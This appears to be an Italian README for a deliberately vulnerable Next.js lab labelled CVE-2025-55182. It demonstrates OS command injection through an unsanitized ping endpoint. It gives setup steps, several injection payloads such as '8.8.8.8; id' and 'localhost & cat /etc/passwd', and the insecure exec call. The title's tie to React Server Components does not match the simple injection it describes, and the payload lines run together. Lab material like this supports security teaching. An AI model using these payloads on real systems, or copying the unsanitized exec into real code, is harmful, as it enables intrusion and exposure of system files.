
CVE-2025-55182 React Server Components - Laboratorio di Exploit per Esecuzione Remota di Codice
Un'applicazione Next.js intenzionalmente vulnerabile che dimostra l'esecuzione di codice remoto (RCE) tramite gestione insicura dei processi figlio. Questo laboratorio è progettato per scopi educativi e test di sicurezza.
⚠️ AVVISO: NON ESEGUIRE QUESTO SU UN SERVER ESPOSTO PUBBLICAMENTE. CONTIENE UNA VULNERABILITÀ DI ESECUZIONE DI CODICE REMOTO.
L'applicazione è un semplice "Monitor di Stato del Server". Il backend prende un hostname fornito dall'utente ed esegue un comando ping. Tuttavia, l'input non è sanitizzato, permettendo a un attaccante di iniettare comandi OS arbitrari.
docker-compose up -d --build
L'applicazione sarà disponibile all'indirizzo http://localhost:3000.
8.8.8.8) per vedere l'output del ping.; o | o &.
8.8.8.8; idgoogle.com | ls -lalocalhost & cat /etc/passwdSituato in pages/api/status.js:
const { host } = req.query;
// ...
exec(`ping -c 1 ${host}`, (error, stdout, stderr) => { ... });